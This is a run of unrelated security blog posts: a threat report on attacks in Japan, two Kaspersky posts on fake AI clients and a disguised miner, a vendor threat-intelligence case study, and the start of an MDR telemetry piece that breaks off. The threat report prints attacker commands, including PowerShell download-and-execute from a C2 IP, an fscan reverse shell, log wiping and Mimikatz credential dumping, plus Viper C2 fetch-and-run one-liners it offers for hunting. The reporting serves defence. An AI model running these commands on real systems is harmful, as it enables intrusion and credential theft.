The PowerShell injector script is embedded with either base64-encoded or a hexadecimal data blob of the Cobalt Strike reverse http shellcode. Upon execution, it injects and executes the Cobalt Strike reverse HTTP shellcode on the victim machine’s memory and connects to the Cobalt Strike server running on the C2 server over HTTP, enabling remote access to the victim machine.  

Unmasking the new persistent attacks on Japan
Sample PowerShell injector script.

The shellcode connects to the C2 server 38[.]14[.]255[.]23 through HTTP using the port 8077 and the URL paths “/6Qeq” or “/jANd”. The attacker has used one of the two HTTP header’s user agents.  

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; LEN2)
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0; BOIE9; ENUS)

Unmasking the new persistent attacks on Japan
Snippet of the Cobalt Strike reverse HTTP shellcode.

Post-exploitation activities 

After gaining remote access to the victim machine through Cobalt Strike reverse HTTP shellcode, the attacker remotely executes commands on the victim machine from the Cobalt Strike server that is configured with plugins from the “TaoWu” Cobalt Strike kit (hxxps[://]github[.]com/pandasec888/taowu-cobalt_strike) to perform the post-exploitation tasks. 

Below are the post-exploitation commands that we observed in this attack that relate to the MITRE ATT&CK framework. 

Reconnaissance  

ATT&CK Technique: System Owner/User Discovery (T1033) 

The attacker gathers the victim’s system and user information and also checks the time synchronization by remotely executing the following commands on the victim machine.  

whoami  /all 
dir 
net time 

Privilege escalation

ATT&CK Technique: Exploitation for Privilege Escalation (T1068) 

The attacker attempts to elevate the user privileges by executing privilege escalation exploits, including JuicyPotato, RottenPotato, and SweetPotato. These Potato exploits abuse the Windows method of handling authentication and impersonation tokens to escalate privileges from a low-privileged user to SYSTEM user.   

Microsoft has already patched the flaws that these exploits target in Windows 10 and Windows Server 2012, 2016, and 2019, as well as in the latest versions. However, if a Windows process has “SeImpersonatePrivilege” permission enabled that allows a process to impersonate another user’s security token, it could still be abused for privilege escalation using JuicyPotato, SweetPotato, and RottenPotato.  

The attacker uses Ladon[.]exe, a plugin of the “TaoWu” Cobalt Strike kit, to bypass the user access controls in the victim machine.  

Ladon.exe BypassUac C:WindowsTemp123.exe 

Persistence 

ATT&CK Technique: Modify Registry (T1112) 

ATT&CK Technique: Scheduled task/job (T1053)  

ATT&CK Technique: Create or Modify System Process (T1543)  

The attacker leverages the “reg add” command and other .NET plugins of the TaoWu Cobalt Strike kit to modify the registry keys and create the Windows scheduled tasks to establish persistence on the victim machine. 

The attacker executes the “reg add” command to add the path of the beacon executable to the Run registry key. 

reg add "HKLMSoftwareMicrosoftWindowsCurrentVersionRun" /v Svchost /t REG_SZ /d "C:Windowssystem32cmd.exe" /f C:WindowsTemppayload.exe 

The attacker runs “sharpTask.exe”, a .NET program used to schedule a task on the Windows machine. 

sharpTask.exe --AddTask Computer|local|hostname|ip 24h:time|12:30  some Service "Some Service" C:WindowsTemppayload.exe 

They run “SharpHide.exe”, the utility used to create a hidden registry key.  

SharpHide.exe action=create keyvalue="C:WindowsTemp123.exe" 

They also run “SharpStay.exe”, a .NET tool used to create a service in the Windows machine.  

SharpStay.exe action=CreateService servicename=Debug command="C:Windowstmppayload.exe" 

Detection evasion

ATT&CK Technique: Indicator Removal on Host: Clear Windows Event Logs (T1070.001) 

The attacker erases evidence of their activity on the victim machine by clearing the Windows event logs on the compromised endpoint using the living-off-the-land binary (LoLBin) “wevtutil.exe”.  

wevtutil cl security 
wevtutil cl system 
wevtutil cl application 
wevtutil cl windows powershell 

Lateral movement  

ATT&CK Technique: Lateral Tool Transfer (T1570) 

The attacker uses fscan.exe, an open-source network scanning utility, and Seatbelt, a tool used to collect detailed information about a system—such as remote access configurations, network shares, and other security-relevant data on victim machine —to perform network reconnaissance and lateral movement in the victim network.  

The attacker uploads the utility “fscan.exe” from the C2 server to the “C:WindowsTemp” directory on the victim machine. 

upload /"C2 server path"/fscan.exe 

The attacker runs the .NET program “Seatbelt.exe” to gather the remote access-related information of the victim machine. 

Seatbelt.exe -group=Remote -full 

The attacker runs “SharpGPOAbuse.exe”, a tool used to abuse group policy objects (GPOs) for malicious purposes. The attacker creates a scheduled task via GPO named “update” that runs a PowerShell command across the network, which downloads and executes the attacker’s PowerShell payload. 

SharpGPOAbuse.exe --AddComputerTask --TaskName "update" --Author DOMAINAdmin --Command "cmd.exe" --Arguements "/c powershell.exe -nop -w hidden -c "IEX ((new-object new.webclient).downloadstring('http[://]38[.]14[.]255[.]23[:]8000/payload.ps1'))"" --GPOName "Default Server Policy" 

The attacker runs “fscan” to scan the local subnet of the victim’s network with a range of 256 IP addresses to discover other machines, ports, and services in the sub-network.  

fscan.exe -h 192[.]168[.]1[.]1/24 

The attacker locates SSH services that accept a public key, automating SSH brute-forcing by providing the public key (id_rsa.pub) to gain unauthorized access to SSH-enabled machines. They also attempt to brute-force SSH credentials for services running on a non-default port (2222). 

fscan.exe -h 192[.]168[.]1[.]1/24 -rf id_rsa.pub 
fscan.exe -h 192[.]168[.]1[.]1/24 -m ssh -p 2222 

Using the fscan utility, the attacker opens a reverse shell, enabling the attacker to execute commands on victim machines in the subnet while connecting back to their server on port 6666, and executes the “whoami” command on the accessible machines. 

fscan.exe -h 192[.]168[.]1[.]1/24 -rs 192.168.1.1:6666 
fscan.exe -h 192[.]168[.]1[.]1/24 -c whoami 

Credential access and exfiltration  

ATT&CK Technique: OS Credential Dumping (T1003) 

ATT&CK Technique: OS Credential Dumping: LSASS Memory (T1003.001) 

ATT&CK Technique: Exfiltration Over C2 Channel (T1041) 

The attacker executes Mimikatz commands to gather plaintext passwords and NTLM hashes from memory on the victim’s machine. 

sekurlsa::logonpasswords 

Attacker’s tradecraft has similarities with a hacker group 

We observed the attacker exploiting the weakness in the vulnerable systems to gain initial access and execute Cobalt Strike reverse HTTP beacons to have continued remote access to the victim machine. They have used the Cobalt Strike kit “TaoWu” that has several plugins, including sharpTask.exe, SharpHide.exe, SharpStay.exe, Ladon.exe, and fscan, and Mimikatz  for post-exploitation activities.  

Similar techniques were previously observed being used by the hacker group called “Dark Cloud Shield” or “You Dun” in their attacks in 2024, as reported by the DFIR Report.  

However, we are not attributing the attacks to the “You Dun” group, as we did not observe any further activities after harvesting the victim machine credentials in the current intrusion. 

Unmasking the new persistent attacks on Japan

Potential abuse of adversarial tools and frameworks 

We discovered that the attacker has used two C2 servers with IP addresses 38[.]14[.]255[.]23 and 118[.]31[.]18[.]77 hosted on Alibaba cloud running the Cobalt Strike team server. During our research period, we noticed that the attacker has left the directory listings and access of the root folder to the internet in the C2 server 38[.]14[.]255[.]23, according to our OSINT research artefacts.  

We found PowerShell scripts, Cobalt Strike beacon executables, and exploit programs along with the attacker’s command execution history logs in the C2 server’s exposed folder. Our further analysis of the contents of the exposed folder showed that the attacker had downloaded and executed a pre-configured installer shellscript called  “LinuxEnvConfig.sh” from the repository “yijingsec” on Gitee platform (hxxps[://]gitee[.]com/yijingsec/), a Chinese Git-based platform like GitHub. The author had described that the repository belongs to a network security talent training service provider called “Yijing Network Security Academy,” which indicates that the attacker is likely abusing the legitimate resource for malicious intention. 

The shell script “LinuxEnvConfig.sh” appeared to be designed to configure foundational environments for Ubuntu, Debian, and Kali Linux systems and facilitates the setup of various publicly available offensive security frameworks and tools, including Vulfocus, Asset Reconnaissance Lighthouse (ARL), Viper C2, Starkiller, BeEF, and Blue-Lotus that are packaged and staged  as docker containers in the docker container registry called “registry[.]cn-shanghai[.]aliyuncs[.]com”, an Alibaba cloud container Registry (ACR) located in the Shangai, China, region.   

We also found that the shellscript, when executed by a user, modifies the machine’s DNS settings, pointing to a specific DNS server with the IP address 114[.]114[.]114[.]114, which is a Chinese 114DNS service and is not used very often in other regions. 

Unmasking the new persistent attacks on Japan
Menu-driven interface of the LinuxEnvConfig.

We have continued to see various threat actors abusing publicly available tools, such as Cobalt Strike, Metasploit, ARL, Vulfocus, and PowerShell Empire for their malicious intentions. Still, we found that some of the tools and frameworks, such as Blue-Lotus, BeEF, and Viper C2, that the shell script “LinuxEnvConfig” deploys, were not seen very often being held in the possession of an attacker, and we have documented them further in the blog post to provide an overview of the capabilities and functionalities that an attacker could leverage by abusing such tools.  

Blue-Lotus 

Blue-Louts is a JavaScript webshell cross-site scripting attack framework. Blue-Lotus is docker-based and was developed by Firesun[.]me and the Blue Lotus team, a cybersecurity technology competition and research team from Tsinghua University. 

Unmasking the new persistent attacks on Japan

Blue-Louts’ administrative panel is in Chinese with an XSS receiving dashboard that displays the connection details of the victim machine, including the IP address and browser. 

Unmasking the new persistent attacks on Japan
Blue-Lotus tool control panel. 

Blue-Lotus has the payload generation panel where the user can generate the JavaScript webshell payload using the default JavaScript template from the tool’s database. An attacker using the framework can generate the webshell  and instrument them in their attacks to perform following tasks: 

  • Cross-site scripting (XSS). 
  • Screen capture of remote machine.  
  • Get the reverse shell access to the remote machine.  
  • Steal the browser cookies. 
  • Creation of user ID and passwords in the Content Management System (CMS).  
Unmasking the new persistent attacks on Japan
Blue-Lotus payload generation panel. 

BeEF

BeEF is a publicly available browser exploitation framework that an attacker can hook to one or more web browsers in the victim machine and execute commands within the browser context. BeEF has command modules that consist of JavaScript codes to perform the following tasks: 

  • Check if the links, forms, and URI paths of the web page in a hooked browser are vulnerable to XSS. 
  • Submit arbitrary requests on behalf of the hooked browser. 
  • Interact with the host on the local network of the hooked browser. 
  • Send commands to the victim systems through Web Real-Time Communication (WebRTC) caller.  
Unmasking the new persistent attacks on Japan
BeEF tool dashboard. 

Viper C2 

The Viper C2 is a modular framework with multiple plugins and scripts that define its extensive functionalities. The C2 has built-in integration with the (MSF) meterpreter console and scripts.  

Viper C2 has functionalities, such as: 

  • Antivirus software bypass.  
  • Intranet tunnel. 
  • File management of the remote machine, such as upload and execute other executable files. 
  • Remote command execution on compromised host. 
  • Generate payloads of Meterpreter reverse shell in multiple forms that work on Windows, Linux, and MacOS. 
  • Display the network topology of the compromised network. 
Unmasking the new persistent attacks on Japan
Viper C2 control panel. 

Viper C2 has the capability of generating the payload of Meterpreter HTTP and TCP reverse shell for multiple platforms, including Windows, Linux, MacOS, Android, Java, and Python. The payloads can be generated in different formats, such as EXE, DLL, ELF, ELF-SO, MSBuild, Macho, PowerShell script, PowerShell command, Python script, and HTA and VBA scripts.  

Unmasking the new persistent attacks on Japan 

Unmasking the new persistent attacks on Japan 

Viper C2 payload generation panel. 

Generated payloads are delivered to victims using the Viper C2 web delivery commands that the user can generate, including the delivery URL and instrument in their attacks.  

Unmasking the new persistent attacks on Japan
Viper C2 web delivery panel. 

We compiled some of the command formats generated from Viper C2 that assists defenders and threat hunters for hunting threats related to Viper C2, shown below: 

Windows: 

regsvr32 /s /n /u /i:hxxp[://]C2 server:port/SWLonxen.sct scrobj.dll 

Linux: 

wget -qO lYoSQUgn --no-check-certificate hxxp[://]C2 server:port/oegqPVin; chmod +x lYoSQUgn; ./lYoSQUgn& disown 

PHP: 

php -d allow_url_fopen=true -r "eval(file_get_contents(' :/bIBNfnlE', false, stream_context_create(['ssl'=>['verify_peer'=>false,'verify_peer_name'=>false] ])));" 

Python: 

python -c "import sys;import ssl;u=import('urllib'+{2:'',3:'.request'}[sys.version_info[0]],fromlist=('urlope n',));r=u.urlopen(' :/wXAOAUIK', context=ssl._create_unverified_context());exec(r.read());" 

PowerShell: 



[Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;
 
$pbFU=new-object net.webclient; 
if([System.Net.WebProxy]::GetDefaultProxy().address -ne $null)
{$pbFU.proxy=[Net.WebRequest]::GetSystemWebProxy(); 
$pbFU.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;}; 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port/WyeslpUl/KaptrNuHdqhM’)); 
IEX ((new-objectNet.WebClient).DownloadString(‘C2 server:port’); 

Linux download and execute: 

wget -O 1737698200.elf --no-check-certificate hxxps[://]C2 server:port 
/api/v1/d/?en=/6trTQMIGpJgIMksMielQg%3D%3D && chmod 755 
1737698200.elf && ./1737698200.elf 

Coverage 

Unmasking the new persistent attacks on Japan

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here. 

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat. 

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device. 

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products. 

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles.  Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work.  Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access. 

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.  

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.  

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.  

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.  

Snort SIDs for this threat: 

Snort 2: 64632, 64633, 64630, 64631. 

Snort 3: 301157, 301156. 

Indicators of Compromise 

IOCs for this threat can be found in our GitHub repository here

Cisco Talos Blog – ​Read More

Attackers distributing Trojans disguised as DeepSeek or Grok clients for Windows | Kaspersky official blog

In early 2025, the Chinese chatbot, DeepSeek, burst onto the AI scene. It provoked much comment and controversy across the globe: we could hardly fail to spot the similarity of its logo to our own, comparisons with ChatGPT were abundant, and in Italy, South Korea, Australia, and other countries, DeepSeek was blocked altogether. The hype was — and remains — intense, including among cybercriminals.

We’ve discovered several groups of sites mimicking the official chatbot website and distributing malicious code under the guise of what appears to be a legitimate client. To find out exactly how these cybervillains operate, and how to use AI safely, read on…

Malicious scripts and geofencing

Several malware distribution schemes were detected, all of which had the use of fake DeepSeek websites as the common denominator. The difference lies in what was distributed through these sites and how. This post thoroughly explores one of these schemes; for details on the others, see our full report on Securelist.

What would you think if you landed on a website with the domain deepseek-pc-ai[.]com or deepseek-ai-soft[.]com? You’d probably assume you could find there some DeepSeek-related software. And what kind of software might that be? A DeepSeek client, of course! And indeed, you’ll quickly see the bright Download and slightly duller Start Now buttons that greet visitors to the site.

Fake DeepSeek web page

Fake DeepSeek web page

Whichever of these buttons you click, an installer starts downloading. But there’s a catch: once initiated, instead of installing DeepSeek, the installer accesses malicious URLs, and manipulates scripts to activate the SSH service in Windows to configure it to work with the attackers’ keys. This enables them to remotely connect to the victim’s computer, who doesn’t even get a DeepSeek Windows client as consolation… which, by the way, doesn’t exist.

Interestingly, the fake sites use geofencing — restricting access based on the region of the IP address. For example, users from Russia on these domains saw a simple stub site with empty texts about DeepSeek — most likely generated by DeepSeek itself or a different large language model. Visitors from other countries, however, were taken to the malicious site distributing the fake client.

A million views on X

The main vector for distributing links to the malicious URLs was posts on the social network X (formerly Twitter). One of the most popular posts (now deleted) was published from the account of Australian startup Lumina Vista, which, open sources say, has no more than 10 employees. The company’s account itself is in its infancy: it only got the coveted blue check-mark in February 2025, and boasts just a dozen posts and fewer than 100 subscribers. Yet the post promoting the fake DeepSeek site garnered 1.2 million views and more than 100 reposts. Bit fishy? We investigated the accounts that reposted it and concluded that they could be bots, since all use the same naming convention and identifiers in the bio section. Incidentally, it’s quite possible that Lumina Vista’s account was simply hacked and used for paid promotion of the attackers’ ad post.

1.2 million views in a near-empty account? Smells like paid promotion

1.2 million views in a near-empty account? Smells like paid promotion

In the comments, some users pointed out that the link leads to a malicious site, but they were in the minority — the rest were simply expressing views about DeepSeek, Grok, and ChatGPT. However, none of the commenters noted the obvious: DeepSeek has no native client for Windows, and you can only access it in a browser. You can also run DeepSeek locally but that requires specialized software.

How to use AI safely

At present, it’s not easy to assess the scale of this and other malicious schemes involving fake DeepSeek pages. But one thing is for certain: these campaigns are massive and not targeted at specific users. Yet they’re developing very quickly: soon after the announcement of Grok-3, attackers began offering to download its client both from the domain v3-grok[.]com, and from… v3-deepseek[.]com! Indeed, Grok, DeepSeek – what’s the difference?…

Without reliable protection, any AI enthusiast is at risk. That’s why it’s vital to follow the safety rules and recommendations when using AI.

  • Check the URLs of websites you visit. Especially when it’s something new, popular, and easy to spoof.
  • Filter sensitive data. Remember that what you write to a chatbot could be used against you: as with other cloud services, data can leak due to security flaws or account hacking.
  • Protect your devices. Check out the reviews and choose the best solution for you that will spot phishing sites and guard against downloading malware.
  • Limit the use of third-party plugins. Every add-on app creates new threats. Special monitoring is required for execution plug-ins that can, for example, run malicious code to buy a plane ticket at your expense.

If you’re seriously interested in neural networks and want to learn how to use them safely, check out these posts:

Kaspersky official blog – ​Read More

Cybercriminals are distributing a miner disguised as a restriction-bypassing toolCybercriminals are distributing a miner disguised as a restriction-bypassing tool | Kaspersky official blog

Over the past six months, Windows Packet Divert drivers for intercepting and modifying network traffic on Windows systems have become popular in Russia. From August to January 2024, we noted that detections of these drivers almost doubled. The main reason? These drivers are being used in tools designed to bypass restrictions for accessing foreign resources.

This surge in popularity hasn’t gone unnoticed by cybercriminals. They’re actively distributing malware disguised as bypassing tools — and they’re doing it by blackmailing bloggers. So, every time you watch a video titled something like “How to bypass restrictions…”, be especially cautious — even the most reputable content creators might unknowingly be spreading stealers, miners, and other malware.

How cybercriminals exploit unsuspected users — and where bloggers fit into the picture — is what we’ll explore in this article.

Hackers disguised as honest developers

There are plenty of software solutions designed to bypass restricted access to foreign platforms, but they all have one thing in common — they’re created by small-time developers. Such programs spread organically: an enthusiast writes some code, shares it with friends, makes a video about it, and voilà — yesterday’s unknown programmer becomes a “people’s hero”. His GitHub repository is starred tens of thousands of times, and people thank him for restoring access to their favorite online resources. We recently wrote about one such case where cybercriminals boosted GitHub repositories containing malware.

There may be dozens or even hundreds of such enthusiasts — but who are they, and can they be trusted? These are key questions both current and potential users of these programs should be asking. A major red flag is when these developers recommend disabling antivirus protection. Disabling protection to voluntarily give a potential hacker access to your device? That’s a risky move.

Of course, behind the mask of a people’s hero might be a hacker looking for profit. An unprotected device is vulnerable to malware families like NJRat, XWorm, Phemedrone, and DCRat, which have been commonly spread alongside such bypassing software.

Where do bloggers fit in?

We’ve identified an active miner distribution campaign that has claimed at least two thousand victims in Russia. One of the infection sources was a YouTube channel with 60,000 subscribers. The blogger uploaded several videos on bypassing restrictions, with a link to a malicious archive in the description. These videos accumulated over 400,000 views in total. Later, the channel owner deleted the link, leaving this note: “Download the file here: (program does not work)”. Originally, the link led to the fraudulent site gitrok[.]com, where the infected archive was hosted. According to the site’s counter, at the time of our study the bypassing tool had been downloaded at least 40,000 times.

Don’t rush to put all the blame on the bloggers — in this case, they were simply following the orders of cybercriminals, unaware of what was really going on. Here’s how it works. First, the criminals file a complaint against a video about such a restriction-bypassing tool, pretending to be the software’s developers. Then they contact the video creator and persuade them to upload a new video, this time containing a link to their malicious website — claiming that this is now the only official download page. Of course, the bloggers have no idea the site is distributing malware — specifically, an archive containing a miner. And for those who’ve already uploaded three or more videos on the topic, refusal is not an option. The hackers threaten to file multiple complaints, and if there are three or more, the channel would be deleted.

In addition, the criminals spread their malware and installation guides through other Telegram and YouTube channels. Most of these have been deleted — but there’s nothing to stop them from creating new ones.

What about the miner?

The malware in question was a sample of SilentCryptoMiner, which we covered in October 2024. It’s a stealthy miner based on XMRig, another open-source mining tool. SilentCryptoMiner supports mining of multiple popular cryptocurrencies, including ETH, ETC, XMR, RTM, and others. The malware stops mining upon detecting certain processes, the list of which the criminals can provide remotely to evade detection. That makes it nearly impossible to detect without reliable protection.

For more about the malicious archive and how it persists in the system, check our post on Securelist.

How to protect yourself from miners

  • Ensure that all personal devices have trusted protection to safeguard against miners and other malware.
  • Avoid downloading programs from obscure or little-known sources. Stick to official platforms, but remember — malware can creep into them too.
  • Keep in mind that even the most reputable bloggers can unknowingly spread malware, including miners and stealers.

Here are some relevant articles you can read to learn more about miners and their dangers:

Mario Forever, malware too: a free game with a miner and Trojans inside

XMRig Miner as a New Year’s gift

Prices down, miners up

Kaspersky official blog – ​Read More

How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks 

How can security teams effectively monitor evolving attacks and stay ahead of constantly shifting attacker infrastructure? We spoke with a chief information security officer at a transport company about how they use subscriptions to Search Updates in Threat Intelligence Lookup to tackle this challenge. 

Here’s what we learned. 

Company Info 

Without getting into any specifics, our company operates in the transportation sector, managing logistics across North America, Latin America, and Europe. Right now, the IT security team is at 30 professionals and as the CISO I’m responsible for overseeing strategic planning, risk management, and operations. Speaking of our use of ANY.RUN’s products, currently we have licenses for both the Interactive Sandbox and TI Lookup

What is Threat Intelligence Lookup

TI Lookup from ANY.RUN provides a searchable database of over 40 types of indicators of compromise, attack, and behavior. The new data is extracted from thousands of public malware and phishing samples analyzed in ANY.RUN’s Interactive Sandbox every day.

Since all threats are executed in virtual machines, ANY.RUN takes a comprehensive snapshot of activities recorded during analysis, from network traffic file and paths to registry modifications and mutexes.

Learn more →

Key Security Challenges Faced 

I’d say the entire transportation industry rests on email correspondence. Our company, despite being no match to giants like DHL, still has thousands of clients, contractors, and suppliers that we need to communicate with daily. Naturally, even a small email security slip-up, like exposing a few messages, could create major problems across the board. And attackers know this, too. 

That’s why we pour a good chunk of the team’s resources into threat hunting and ensuring we have a grasp of the current threat landscape. We’re constantly monitoring for the recent attacks, phishing scams, malware campaigns, new CVEs, anything that may somehow be of concern to us. Of course, we can’t gobble up intel on every single threat out there, so we narrow it down to what’s relevant for our industry, and some of the core clients’ industries. 

Where TI Lookup Fits in the Threat Hunting Strategy 

Like any good security setup, we break ours down into areas. TI Lookup adds value pretty much evenly across all of them, from checking indicators as part of triage to discovering threat context in incident response.  

Yet, if we’re talking about threat hunting, we subscribe to Search Updates in TI Lookup to keep up with the changes in ongoing cyber attacks and automate the collection of new indicators of compromise (IOCs) and threat samples. Let me explain how it works. 

Search Updates in TI Lookup 

TI Lookup users can subscribe to custom search queries to receive timely updates on relevant Indicators of Compromise (IOCs), Indicators of Attack (IOAs), and Indicators of Behavior (IOBs) belonging to the threats of their interest. 

Learn more →

Our threat hunting team is tasked with:  

  • Monitoring the current threat landscape 
  • Gathering data on the threats that are relevant to us 
  • Converting the data into actionable signatures and detection rules 

There are several sources for such data, with publicly available research and reports published by other companies being the most common one. The problem here is that attackers constantly shift infrastructure – C2 servers might cycle IPs every 48 hours. So, relying on the indicators we find in public reports can do only so much. And that is precisely the detection gap that Search Updates in TI Lookup help to bridge. 

TI Lookup lets users receive result updates on queries of their interest 

Subscribing to Search Updates in TI Lookup allows us to use more stable indicators of behavior (IOBs) to track all the latest changes in specific attacks and see if they are still ongoing. IOBs are things like the tools used by attackers, the kill chain techniques, and infection traces on the system such as created directories, file names and types, etc. The things that do not tend to expire as fast as short-lived network infrastructure of attackers or hashes. 

Query subscriptions are displayed in the left-side menu with the number of new results next to them 

Essentially, with TI Lookup, we can put several IOBs related to a single attack together and use them in a search query to get notified about the latest samples and IOCs, which the threat hunting team can process and turn into detection rules. 

The result is that we can follow active threats that may potentially target our company almost in real time because TI Lookup is updated every few hours with fresh data. 

Collect intelligence on the latest cyber attacks
with ANY.RUN’s TI Lookup 



Get 50 requests to test it


Some of the Use Cases for Search Updates 

Our current collection of query subscriptions is well beyond a hundred entries. I will try to give you a few general types of threats that we tend to add to it and some of the examples.  

At the moment we subscribe to well over a hundred search queries. To give you an idea of what we monitor, I’ll give you a couple of common threats we tend to follow. 

Geo-Targeted Threats  

While our HQ is in the United States, we have several local offices, which also become extensively targeted with cyber attacks. Search Updates make it easier for us to track several types of threats occurring in a specific country. 

For example, we make sure to check for new samples of email-distributed infostealers in Colombia: 

submissionCountry:”co” AND threatName:”stealer” AND filePath:”.eml” OR filePath:”.msg” 

TI Lookup displays the latest public sandbox analyses featuring infostealers together with .msg and .eml files 

For this query, we get several updates almost every week. 

One of the samples returned by TI Lookup involved AsyncRAT sample 

We check the new samples and see if they have anything of value and if so, use the indicators extracted by the sandbox to make signatures to scan the company’s infrastructure for any matching threats. 

Common Vulnerabilities and Exposures (CVEs) 

Another top concern on any threat hunters’ list is CVEs, both old and new. One of the recent examples is CVE-2025-21298, the vulnerability where simply previewing a malicious .rtf document in Outlook leads to remote code execution and system compromise. 

As soon as we learned about it, we made sure to go to TI Lookup and sign up for a query that would provide us with relevant samples in case any attackers decided to abuse this vulnerability. 

In the query, we combined the file type (rtf) with Outlook, used the attc-doc (document attachment) tag, and excluded pdfs:  

fileEventPath:”rtf$” AND commandLine:”outlook.exe” and threatName:”attc-doc” AND NOT threatName:”attc-pdf” 

The Events tab in TI Lookup provides a list of command line logs recorded across relevant sandbox sessions 

As a result, we now can minimize the manual research on this threat and in case an actual attack with this CVE is uploaded to TI Lookup, we’ll be notified about it. 

Another thing that I think is worth mentioning here is that this CVE is a great example of how flexible TI Lookup can be. Despite not having a specific tag for this threat, we were able to make up for that by using the big selection of search parameters. 

Credential-Theft Attacks  

Given phishing is by far the top threat our company faces, one of the most common types of it is fake credential-stealing forms. 

There is a campaign that has been going for a while, where attackers send emails that contain links to fake Microsoft 365 pages. The catch is that the malicious domain names are designed to masquerade as legit Microsoft ones. One of the standout things here is the use of “0” and “o” before “365”. Needless to say, the Search Updates feature does a great job letting us know about the new domains and actual examples of these attacks. 

domainName:”o365.” OR domainName:”.o365″ OR domainName:”0365.” OR domainName:”.0365″

TI Lookup lists all the matching domains found across relevant sandbox sessions

The team collects new domains and email samples and improves detection of any possible phishing attempts against our own infrastructure. 


Enrich your threat knowledge with TI Lookup

Enrich your threat knowledge with TI Lookup

Learn about TI Lookup and its capabilities to see how it can contribute to your company’s security



Search Updates Hacks 

The thing that’s not related to Query Subscriptions per se but is still of huge help is the wildcards. It really adds flexibility to the searches, so we potentially set up queries to be more specific and general, depending on the indicators we use for a threat. 

Just last week, we subscribed to a query for a new campaign where attackers use website addresses that start with “google.com” but then have random strings of characters afterwards. 

To get the newest variants of these domains, we added the “?” wildcard to the query – which stands for any single character. We used four question marks to account for the random part of the domain. 

domainName:”google.com.????” 

Each of the domains can be explored further in the sandbox sessions where they were logged 

Search Updates let us know every time a matching fake domain is added to TI Lookup’s database. 

Impact on Security 

In terms of company’s security, TI Lookup provides us with some of the latest threat intelligence we can get. We can apply it immediately while indicators are still active to identify threats and protect the organization’s infrastructure in advance. 

It also improves our awareness of the threat landscape, letting us track a wider array of attacks. We now have more data on a broader pool of threats than ever before and can identify the ones that are still ongoing and those that are no longer active. 

Impact on Operations 

If we’re talking about the team’s performance, the productivity definitely went up after we began using Query Subscriptions. Back in the day, we had to allocate a lot of time and staff to follow up on attacks that were relevant to us. This was a lot of manual work. I’m not saying that we no longer do it, but receiving Search Updates definitely made the process much easier.  

We now get automated updates and can actually focus on more threats than before, because we no longer need to rely on guesswork in deciding which attacks will be more likely to affect us. 

Now we simply create a query and hit subscribe. The more new results we see arriving for a particular threat in TI Lookup the higher priority it gets. 

Team Feedback 

Most of the team are well-familiar with the ANY.RUN sandbox, so adopting TI Lookup felt natural for them. It is with some of the new folks on the team we had to work a little harder to get them to a place where they could comfortably use the service. They mostly struggled with the query parameters and their meanings, as well as tags in the sandbox, which are the same in TI Lookup. But most of them managed to become fairly proficient in a week or two. 

Conclusion 

We want to thank the guest for taking the time to share their story and real-world examples of using TI Lookup. The behind-the-scenes view of a threat hunting team’s work is always a rare privilege and we really appreciate it. Our hope is that this article will help other users considering integrating the service in their organization with laying the groundwork for successful implementation.  

As always, if you are open to letting others know how your team uses ANY.RUN’s products, we’ll be happy to hear from you at support@any.run

About ANY.RUN

ANY.RUN helps more than 500,000 cybersecurity professionals worldwide. Our interactive sandbox simplifies malware analysis of threats that target both Windows and Linux systems. Our threat intelligence products, TI Lookup, YARA Search, and Feeds, help you find IOCs or files to learn more about the threats and respond to incidents faster.

Request trial of ANY.RUN’s services for your company → 

The post How Transport Company Gets Real-Time IOC and IOB Updates on Active Cyber Attacks  appeared first on ANY.RUN’s Cybersecurity Blog.

ANY.RUN’s Cybersecurity Blog – ​Read More

What to collect on computers for monitoring complex threats

To effectively counter cyberthreats that circumvent basic security measures, a managed detection and response (MDR) service must ensure the right data collection tools are in place in the protected organization from the start. In addition, the service team and the client team should regularly discuss how to improve telemetry collection, and what other data should be collected in order to stay ahead of evolving attacker tactics. Our experts not only advise clients on proper data collection, but also closely monitor the changing threat landscape to continuously refine the process. Our latest MDR service report details incidents in client infrastructures and the tactics attackers have used. A dedicated section of the report covers the most frequently triggered detection rules in 2024, and what’s required for them to function effectively.

Dumping registry hives

Among the suspicious operations frequently detected in high-severity incidents, the most common by far is the extraction of security-critical data from the system registry (dumping of sensitive registry hives). This activity was observed in 27% of high-severity incidents.

To detect such extraction, the MDR provider must have telemetry from an EDR system installed on all computers and servers in the protected organization. If there’s an endpoint protection system (EPP) that can detect suspicious (not necessarily malicious) activity, this can also serve as a source of the necessary data. An event that most definitely should be logged is registry access.

Malicious code in memory

Many attacks occur in such a way that malicious files are never stored on the hard drive. However, an endpoint protection system can detect malicious code in the memory of a system process or another memory segment. This occurred in 17% of high-severity incidents, and such events from the EPP must be instantly visible to the MDR service.

Suspicious services

The creation and execution of Windows services containing suspicious arbitrary code is a strong indicator of an unfolding cyberattack. This was also detected in nearly 17% of high-severity incidents. To detect this activity, telemetry must include OS system events, process launch information, and the complete contents of all startup lists.

Access to a malicious host

